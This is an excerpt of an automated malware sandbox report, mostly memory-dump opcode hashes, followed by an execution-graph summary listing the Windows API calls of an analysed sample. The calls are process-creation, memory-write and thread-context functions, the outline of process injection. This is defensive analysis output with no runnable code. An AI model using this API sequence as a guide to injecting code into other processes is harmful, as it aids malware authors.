                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e3a238dcd46a66398a0875b0b640a6c61d0b78bdad9e3849890aa39e36f7bd9
                          • Instruction ID: 2941a3594543f9c559b26d32f6023a7f0fcdff789bccafac844f05980f341f68
                          • Opcode Fuzzy Hash: 5e3a238dcd46a66398a0875b0b640a6c61d0b78bdad9e3849890aa39e36f7bd9
                          • Instruction Fuzzy Hash: 56E0723A31420107D304304FAC8A66B6F9EE3DD0A4B88003EF919C3304CC59DC034AA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aef592d081f14479fb9fc2dd226047da297285bf8827891143f48c13e0168870
                          • Instruction ID: cee34a3f37b90e6cc97257c6fe96c964713b41954753a29af11be46b7dd180ae
                          • Opcode Fuzzy Hash: aef592d081f14479fb9fc2dd226047da297285bf8827891143f48c13e0168870
                          • Instruction Fuzzy Hash: 84E0ED367005108F8708966EE544C9ABBDADFC962631940AAE209C7731CE61DC018690
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 53fb5b0dd68ebce1802d7b398762b76ec41fa4f7660f9a210a3a2550274dc940
                          • Instruction ID: d078e2e9d47a8fd4c865bd2525c5dddf4c688aaec4a94a8d605008b1dd31d98d
                          • Opcode Fuzzy Hash: 53fb5b0dd68ebce1802d7b398762b76ec41fa4f7660f9a210a3a2550274dc940
                          • Instruction Fuzzy Hash: 82E0D8333453006FCB168E956D008E67F677FC53203088157FAC2C6221CE748E0697A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61cdbc1421786e18515c039ea89027f603a329ebeda0b1977ced9a3c7505190d
                          • Instruction ID: 5c841144a1a9ab9b309aec2ce14da09d6edb5dd72d18d919e33d209f38b5a154
                          • Opcode Fuzzy Hash: 61cdbc1421786e18515c039ea89027f603a329ebeda0b1977ced9a3c7505190d
                          • Instruction Fuzzy Hash: 46E0E5367105108B8708DA6EE544C5ABBEAEFC962631A40BAE20ACB721CE61EC058690
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f597907707622413bb956849871cb2a907e3cba95494e3a32b68d49e90ee3546
                          • Instruction ID: 1c8f189115343889bed3b03f9baa83d10454e962651a38d1340cc85b4663687b
                          • Opcode Fuzzy Hash: f597907707622413bb956849871cb2a907e3cba95494e3a32b68d49e90ee3546
                          • Instruction Fuzzy Hash: D1E0D831B107254B871826BFB80007A77D9EBC59543254565FC0ED3B44DE20DC5143D4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7a5ac79d3245add753af436ee0d11c543cc3d88f04287bfdbdcdd0e310d5529
                          • Instruction ID: 01351e7a6051415b651d478a908931734e4cd9511a2b3766234e22ff7a6fb02d
                          • Opcode Fuzzy Hash: f7a5ac79d3245add753af436ee0d11c543cc3d88f04287bfdbdcdd0e310d5529
                          • Instruction Fuzzy Hash: 3FE04F773101145BC7109A5EE404D9ABBADDBD87717148037F609CB321CA71DC528AA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2781fd36b93d84cbeb40dccb2830ac2c54b2f3e327b63260dca01839977c5c0
                          • Instruction ID: c8288bb8768872c4211db363484be3a6efbaafe9bb1ab1223915fb739386e182
                          • Opcode Fuzzy Hash: f2781fd36b93d84cbeb40dccb2830ac2c54b2f3e327b63260dca01839977c5c0
                          • Instruction Fuzzy Hash: 6FE0D8726102254BE708B751D4A1B4B37E7EB89150BD51694D6498F356CE54BC0507C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b3b3a7d3c39ac56d07ab9c6e77497ed89ff970342ac71ebcda94855ed1603a3
                          • Instruction ID: 7f925748c65972b1d1749103bf127e3b938db0e2a3d0572c8b1311c380148897
                          • Opcode Fuzzy Hash: 0b3b3a7d3c39ac56d07ab9c6e77497ed89ff970342ac71ebcda94855ed1603a3
                          • Instruction Fuzzy Hash: 44F06596C1E7C40FE30787719E661843F71996315170E06DBD085CF1A7E95C8B4AC767
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7b210239989ebe8b0fd94203361f285d751918758409a4202dfa7caf2a70790
                          • Instruction ID: d9d094efcee704ba3687da6e98670e5646dfda7b1772c6651ef739b81740e9f8
                          • Opcode Fuzzy Hash: d7b210239989ebe8b0fd94203361f285d751918758409a4202dfa7caf2a70790
                          • Instruction Fuzzy Hash: 56E04F33200208BF8B059E45E884C9BBF6FFBCD2603148196FA098B215CA31DC12D7E4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c4616fe019a22fe86243c9cb7d41771e58ed1613e0e6e6465902d81ce1b60f6
                          • Instruction ID: aab589d907b7cb8aac389f6a5a3fee1abbdc29dd147708a0f466e54a4b13a8d6
                          • Opcode Fuzzy Hash: 6c4616fe019a22fe86243c9cb7d41771e58ed1613e0e6e6465902d81ce1b60f6
                          • Instruction Fuzzy Hash: F7E09A7AB11201EFCB558F65E4048D8FB72FB89225B14C066FA068B211CB31D826CB40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2878e9c041bd6b797ff09206fd48f2b348b0acda1d299a931063c19db2c1b000
                          • Instruction ID: 85a160a21c8af7a7057647a1412cb6dc8a76bd7de2b2241cc90165b7741f1602
                          • Opcode Fuzzy Hash: 2878e9c041bd6b797ff09206fd48f2b348b0acda1d299a931063c19db2c1b000
                          • Instruction Fuzzy Hash: A9E07D732043515BC314155DF441B827F68DB922B9F88007FD205C2242D626E8128344
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9213c802e45bc6bb0c6d189940a2805fc6ef7e252aab3c07dd162b88826bf28b
                          • Instruction ID: b149c137ffbdade27140e66df43355067da72ea027225508292a48ad204df232
                          • Opcode Fuzzy Hash: 9213c802e45bc6bb0c6d189940a2805fc6ef7e252aab3c07dd162b88826bf28b
                          • Instruction Fuzzy Hash: E7D05232315225170B15259E688982BBE8EEBCD529314003AFA0AC3300EEA49C038AA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a7d827dd7e7be2266dafccb8a5c8d071a157599b612b6a9fe75bf5e5be55ddd
                          • Instruction ID: a8590463f1dda41a94759d32b946461496cb9f54437ec4ba06e2e2b38928bcd5
                          • Opcode Fuzzy Hash: 8a7d827dd7e7be2266dafccb8a5c8d071a157599b612b6a9fe75bf5e5be55ddd
                          • Instruction Fuzzy Hash: 51D01237300214774B159E9AA805CABBBAFEBC8721308842AFA8586210CEB1D91697A0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f0518b24251c815ab4869e07d5026d3e454b25535393f8f3f0ab118e5fb4e1be
                          • Instruction ID: 6d5609dcec3ec4710e9efc6e6cd63a5ca30f5c7eb9df1b82f278f3bc0468f247
                          • Opcode Fuzzy Hash: f0518b24251c815ab4869e07d5026d3e454b25535393f8f3f0ab118e5fb4e1be
                          • Instruction Fuzzy Hash: 7DD05E333542248FC350DBB9F908E92BBECEB88665B1140A6F20DCB221DAA2D8008780
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab7d6840b977d460b4dcac553e7a80fc5e857696373b98fb9849ebe799e2dd23
                          • Instruction ID: b1640c39e424282e43e0c9934da2f8c77ad29e2f9bd523c65f1486cf076a21b8
                          • Opcode Fuzzy Hash: ab7d6840b977d460b4dcac553e7a80fc5e857696373b98fb9849ebe799e2dd23
                          • Instruction Fuzzy Hash: 9CE01732300225CF8314DFA9E484C92BBE9EF8926535444BAE51EC7721DB72FC50CB84
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1df9fa697b9ad7b80acd8a984507215b29634d983b054cf703f60fcf5a952999
                          • Instruction ID: 0d3037f1c15121ad7e236d6980eb89e37b15b3207dcad6a27cc907ddaa26989a
                          • Opcode Fuzzy Hash: 1df9fa697b9ad7b80acd8a984507215b29634d983b054cf703f60fcf5a952999
                          • Instruction Fuzzy Hash: 47E0C2717002244B8708FB54E090C1B37E7BFC921039152D8E64D4F365CF60BC0247CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bf5e4176c895f37e3c39642ba5c94a0e58576a8dd409e7ba2390b1799be94a5
                          • Instruction ID: 6ede8ff77e72e3f2efa26636d9bbf743811ab6ccc7e3131733e7c2b197e10831
                          • Opcode Fuzzy Hash: 4bf5e4176c895f37e3c39642ba5c94a0e58576a8dd409e7ba2390b1799be94a5
                          • Instruction Fuzzy Hash: 62D05B733003146747145D5AAD05C6BBF6FDBD4621309843EFA4587200CD71D81257E4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f44c67c24aa17200f06c9a17e33995587921de3f49a53f9eb0521786fe01b4d2
                          • Instruction ID: 7849749d58631f803758e2b51be163352c1dbb178a2b73ab63be21e1c53c12ef
                          • Opcode Fuzzy Hash: f44c67c24aa17200f06c9a17e33995587921de3f49a53f9eb0521786fe01b4d2
                          • Instruction Fuzzy Hash: 66D05B727002505FDB268B64F5444AAFFE7DFC8111308855EE5FA87705CA60BD51C780
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 68ecf47f61d1f8eb0a2031d776285c0171d74c98a79db476bc33306883267309
                          • Instruction ID: a18d513e692e8aeaf692dd418bb20637b4b44646e4280659e06d5cb31bc52173
                          • Opcode Fuzzy Hash: 68ecf47f61d1f8eb0a2031d776285c0171d74c98a79db476bc33306883267309
                          • Instruction Fuzzy Hash: 2DE0173504A7859FC302AB38D411089BF70EE57605B866A93C181CB123D721499DCF32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df69e62e20298a94b2c86c2d0a9b6d5443a932eb4a601b9e6baa1c506c7071e6
                          • Instruction ID: 203b4b18d4958310b80dbd55e5c08e7aaa8e49d91cc1c23939f8022b0b9e8f56
                          • Opcode Fuzzy Hash: df69e62e20298a94b2c86c2d0a9b6d5443a932eb4a601b9e6baa1c506c7071e6
                          • Instruction Fuzzy Hash: 2FD0A735F600988FCB049AB8D4119F97BB5EB8526174440F5D306CB261DF22DC024741
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e10029247ce463ecf6e3bff991ac32aa1b60358a0ed9b8536a68cd977a9fd11
                          • Instruction ID: 7f4fb7e42329be1e2bb780ce06617c4b6ca7a04606506efed6f192f632e48bee
                          • Opcode Fuzzy Hash: 2e10029247ce463ecf6e3bff991ac32aa1b60358a0ed9b8536a68cd977a9fd11
                          • Instruction Fuzzy Hash: A3D0A735F500988FCB0097B8D4155F9B7F5DB8525174440F5D30ACB271DF22AC428741
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 991d2db4cd7cba408f034aa5fe2db1019fc86ce08161339e7019fca9b7441c82
                          • Instruction ID: 52c267673bfd6967eaedc9ee3c59294a855ed6d940e4698017e751c6285d50fd
                          • Opcode Fuzzy Hash: 991d2db4cd7cba408f034aa5fe2db1019fc86ce08161339e7019fca9b7441c82
                          • Instruction Fuzzy Hash: 5CD0A735F500988FDB0096B8D4115F97BB5DB8525174400F5D306CB261DF229C024741
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc74316a60634c2ad01d6aab0234d393895a4bcf447046a34f5b7b4f0b6915b1
                          • Instruction ID: ae83d02e6fdb9abf78bf746111e8be75a070457b6aeb460372ff58f78cd9c71e
                          • Opcode Fuzzy Hash: fc74316a60634c2ad01d6aab0234d393895a4bcf447046a34f5b7b4f0b6915b1
                          • Instruction Fuzzy Hash: 7BD0A735F500988FCB0097B8D4155F9BBF5EB8525174540F5D30ACB261DF22EC014741
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0360c4dad0a9a5c933888b5eb36128be0a3aa1b034a733bab4d2a5ecdf64205b
                          • Instruction ID: 79509d12348ad7324e5062f7b36bfddd4e42d46c024248ea7b8aaeed2f5c9422
                          • Opcode Fuzzy Hash: 0360c4dad0a9a5c933888b5eb36128be0a3aa1b034a733bab4d2a5ecdf64205b
                          • Instruction Fuzzy Hash: 23E05E34509340DFD7468F10CA028843F71EB1571070985AAF94DCBA73C335C96ACB51
                          Memory Dump Source

                          Execution Graph

                          Execution Coverage:10.2%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:152
                          Total number of Limit Nodes:8
execution_graph: raw node dump omitted; Win32 API calls referenced by the graph nodes: CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW, DuplicateHandle, CreateActCtxA, DrawTextExW, PostMessageW

                          Control-flow Graph
                          • Basic blocks (rendered graph not recoverable): 144d6b0-144d74f GetCurrentProcess; 144d758-144d78c GetCurrentThread; 144d795-144d7c9 GetCurrentProcess; 144d7d2-144d7ed call 144d890; 144d7f3-144d822 GetCurrentThreadId; 144d82b-144d88d exit
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0144D73E
                          • GetCurrentThread.KERNEL32 ref: 0144D77B
                          • GetCurrentProcess.KERNEL32 ref: 0144D7B8
                          • GetCurrentThreadId.KERNEL32 ref: 0144D811
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 11feab83a76eaeb64e46b7365e7f68ce1ad766d8ab9f8346ff6d4ec3c3e29d65
                          • Instruction ID: e8d2a65f4bb2e5d35df95f34e3250567d3e90a4a26ac244439b1b9de7759fee7
                          • Opcode Fuzzy Hash: 11feab83a76eaeb64e46b7365e7f68ce1ad766d8ab9f8346ff6d4ec3c3e29d65
                          • Instruction Fuzzy Hash: C15197B0D013498FEB14DFAAD949BAEBBF1EF48314F20845AE419A73A0D7345845CF65

                          Control-flow Graph
                          • Basic blocks (rendered graph not recoverable): 144d6c0-144d74f GetCurrentProcess; 144d758-144d78c GetCurrentThread; 144d795-144d7c9 GetCurrentProcess; 144d7d2-144d7ed call 144d890; 144d7f3-144d822 GetCurrentThreadId; 144d82b-144d88d exit
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0144D73E
                          • GetCurrentThread.KERNEL32 ref: 0144D77B
                          • GetCurrentProcess.KERNEL32 ref: 0144D7B8
                          • GetCurrentThreadId.KERNEL32 ref: 0144D811
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 8b0e5571db070313a107f1ef2e32314ce638875cfe23e267a53f498a87839240
                          • Instruction ID: 9d1a9d3765928a9646dce30ec704d8fc54890ead0bc6f2a4fc95d0280e1999e5
                          • Opcode Fuzzy Hash: 8b0e5571db070313a107f1ef2e32314ce638875cfe23e267a53f498a87839240
                          • Instruction Fuzzy Hash: 745177B0D013498FEB14DFAAD549BAEBBF1EF88314F208459E419A73A0D7346845CF65

                          Control-flow Graph
                          • Basic blocks (rendered graph not recoverable): 749d365-749d405 entry; three short loops at 749d425-749d434, 749d47e-749d48d and 749d4e6-749d4f5; 749d4ff-749d5b9 CreateProcessA; 749d5c2-749d648 and 749d64a-749d6b5 after the call
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D5A6
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: ad4dd28d7bf2b89941a10296b48474288f25c809ddb793a0bd6a4bb5f78e2adf
                          • Instruction ID: 56c518dd4ef6de6515be09b89a4f158aeb34bbbf92dfe20260c1b41cced9419e
                          • Opcode Fuzzy Hash: ad4dd28d7bf2b89941a10296b48474288f25c809ddb793a0bd6a4bb5f78e2adf
                          • Instruction Fuzzy Hash: 75A15EB1E0071A8FEF24CF68C9417DEBBB2BF44314F1485AAD808A7250DB759985CF91

                          Control-flow Graph
                          • Basic blocks (rendered graph not recoverable): 749d370-749d405 entry; three short loops at 749d425-749d434, 749d47e-749d48d and 749d4e6-749d4f5; 749d4ff-749d5b9 CreateProcessA; 749d5c2-749d648 and 749d64a-749d6b5 after the call
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D5A6
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 952a15fa64dc0843c9ebe271b553cd6ba063c24b56be057db128100de879c030
                          • Instruction ID: 8f26954304f66408fb53ca0f30085ccc77c050896b885503bf0faf1c105531cf
                          • Opcode Fuzzy Hash: 952a15fa64dc0843c9ebe271b553cd6ba063c24b56be057db128100de879c030
                          • Instruction Fuzzy Hash: A8915EB1E0071A8FEF24CF69C8417DEBBB2BF48310F1485AAD808A7240DB759985CF91
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B67E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 652b2081af6bbe55679e621d6f4093d2fe3e58c5393936ee053dcfa7d6ff8324
                          • Instruction ID: 0701986d246755ff8cc47d22aaca377a3872072ddf0e4d915f96fb58fd389637
                          • Opcode Fuzzy Hash: 652b2081af6bbe55679e621d6f4093d2fe3e58c5393936ee053dcfa7d6ff8324
                          • Instruction Fuzzy Hash: DD812370A00B058FE725DF2AD45576ABBF1FF88204F00892ED49ADBB60D774E946CB91
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 014459C9
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 30d8ef21b93c2e84e466aa08e439a5f647ce7e4fd9d911f15302ef68aa87a8ae
                          • Instruction ID: c8891f10136495309b787713f5ea9ab244f822faf711df2e3b413c6330f2f62d
                          • Opcode Fuzzy Hash: 30d8ef21b93c2e84e466aa08e439a5f647ce7e4fd9d911f15302ef68aa87a8ae
                          • Instruction Fuzzy Hash: 1741D0B1C40719CBEF24DFAAC884BDEBBB5BF49314F20816AD408AB261DB755946CF50
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 014459C9
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: c5ab797eae12a876f8f2a139696e53ad4f0a37aba0ae05791cdfb5cf44b60572
                          • Instruction ID: 0bc87d8ba7b60681705efc6d64eea603283b04c2a975d3ef983e0543511182e3
                          • Opcode Fuzzy Hash: c5ab797eae12a876f8f2a139696e53ad4f0a37aba0ae05791cdfb5cf44b60572
                          • Instruction Fuzzy Hash: 1A41D271C0071DCBEB24DFAAC84478EBBB5BF49314F20816AD408AB261DB756946CF90
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D178
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: d76070c144a44e1744ee18dd9e3d183f2f2b535ea18ba6bc5cfe2a6a1efaa844
                          • Instruction ID: 7c7cd7b8ff8338745c55ec49a47e49600a170ab40b24b88a5a3d46093faa78d7
                          • Opcode Fuzzy Hash: d76070c144a44e1744ee18dd9e3d183f2f2b535ea18ba6bc5cfe2a6a1efaa844
                          • Instruction Fuzzy Hash: 873147B2D003499FDB10DFA9D881BEEBFF5FB48314F14842AE958A7241D7799541CBA0
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0555A277
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1389981190.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_5550000_RTdozXra.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: e1cf3acf5ce8d8799693c029d331d986676509c20bc3fd437c4711b84e05c0b5
                          • Instruction ID: 4f48ff2f818bbb3a7cf065740aef5adc20d397d06b195dcb8ddc3cb9843faeae
                          • Opcode Fuzzy Hash: e1cf3acf5ce8d8799693c029d331d986676509c20bc3fd437c4711b84e05c0b5
                          • Instruction Fuzzy Hash: E33100B5D0034A9FDB10CF9AD884A9EFBF4FB48320F54852AE819A7210D775A945CFA0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749CB96
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 8d1e548b22e47d3c4c8ec0aae496f6b60a83059fbe06300c52fe21c772074888
                          • Instruction ID: 9c0d97ffaec85402215b996a7a3e34a02dfd048004c43a70f5a005cbb7728c0e
